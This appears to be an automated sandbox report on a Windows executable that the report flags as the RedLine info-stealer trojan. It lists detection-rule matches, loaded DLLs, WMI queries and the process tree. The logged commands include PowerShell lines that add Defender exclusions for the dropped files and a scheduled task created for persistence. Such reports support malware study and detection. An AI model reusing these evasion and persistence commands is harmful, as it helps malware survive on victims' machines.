Source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: PO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QntRsaVyLKlY.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.AddAccessRule
Source: 7.2.PO.exe.7500000.7.raw.unpack, x3jKeUAdnBO4kHagia.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, x3jKeUAdnBO4kHagia.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.AddAccessRule
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs	Security API names: _0020.AddAccessRule
Source: 7.2.PO.exe.43feae0.1.raw.unpack, x3jKeUAdnBO4kHagia.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/102@1/1

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C7DB06 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00C7DB06

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Mutant created: \Sessions\1\BaseNamedObjects\uRVVaFUUJELQIo
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03

Source: C:\Users\user\Desktop\owKQ0b029a.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Command line argument: sfxname	0_2_00C80F8F
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Command line argument: sfxstime	0_2_00C80F8F
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Command line argument: STARTDLG	0_2_00C80F8F

Source: owKQ0b029a.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\owKQ0b029a.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2373502657.0000000007C44000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2368393020.00000000068C5000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000338F000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000331B000.00000004.00000800.00020000.00000000.sdmp, tmpA3E9.tmp.22.dr, tmpBC4F.tmp.15.dr, tmp47A1.tmp.22.dr, tmp155D.tmp.15.dr, tmp478F.tmp.22.dr, tmpA41B.tmp.22.dr, tmpA40B.tmp.22.dr, tmpA42C.tmp.22.dr, tmpA43C.tmp.15.dr, tmp155E.tmp.15.dr, tmpDD25.tmp.15.dr, tmp477F.tmp.22.dr, tmpBC3D.tmp.15.dr, tmpBC1D.tmp.15.dr, tmpDD35.tmp.15.dr, tmp4790.tmp.22.dr, tmp157F.tmp.15.dr, tmpBC60.tmp.15.dr, tmpBC70.tmp.15.dr, tmpA3FA.tmp.22.dr, tmp47A2.tmp.22.dr, tmp47B3.tmp.22.dr, tmpBC4E.tmp.15.dr, tmp1580.tmp.15.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: owKQ0b029a.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\owKQ0b029a.exe

File read: C:\Users\user\Desktop\owKQ0b029a.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\owKQ0b029a.exe "C:\Users\user\Desktop\owKQ0b029a.exe"
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
